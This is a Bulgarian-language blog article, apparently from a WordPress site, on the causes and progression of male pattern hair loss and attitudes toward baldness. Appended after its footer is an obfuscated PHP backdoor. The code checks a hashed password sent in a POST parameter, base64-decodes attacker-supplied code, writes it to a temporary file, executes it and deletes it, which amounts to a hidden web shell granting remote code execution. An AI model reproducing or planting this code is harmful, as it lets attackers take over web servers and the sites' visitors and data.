Косопад при мъжете | Косопад

Причини за косопад при мъжете

Особености на косопада при мъжете

Косопад при мъжете

Косопад при мъжете

Последните статистически данни показват, че половината от представителите на мъжкото съсловие страдат от оплешивяване след навършване на петдесетгодишна възраст. Причината за косопад при мъжете се крие в завишената чувствителност на скалпа към мъжките полови хормони и се получава по наследство. Предаването на генетична информация от поколение на поколение не може да бъде предотвратено и олисяването на темето да се избегне.

Хормоналната бомбардировка с тестостерон кара фоликулите на космите да се свиват и с течение на времето те стават твърде малки. Въпреки че са все още живи, нямат способността да изпълняват обичайните си функции и да заместят падналите косми с нови. Подобно състояние често започва след 30 годишна възраст и се развива по определен модел до навършване на 50. Първоначално се забелязва така нареченото отдръпване на косата и се оголва темето, след което се стига до пълно оплешивяване.

Косопад при мъжете

Класически пример за косопад при мъжете

Само допреди няколко години, консервативното общество смяташе силния косопад при мъжете и последвалото оплешивяване за сериозен недостатък, защото нямаше голям избор от техники за лечение. Засегнатите се подлагаха на ултраскъпи и болезнени процедури за присаждане на коса, които често бяха с нулев ефект от естетическа гледна точка. Това докарваше мнозина до отчаяние и те отказваха да приемат състоянието си, въпреки съветите на водещи психолози.

С напредването на новите технологии тези проблеми отпаднаха, защото сега неприятният косопад може да се овладее още в начален стадий. А на много места вече смятат, че мъжете с голи глави са по – секси. Освен това съвременната медицина предлага страхотни методи за противодействие и някои от тях дават страхотни резултати в борбата срещу косопад при мъжете.

28. март 2013 12:34:32 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}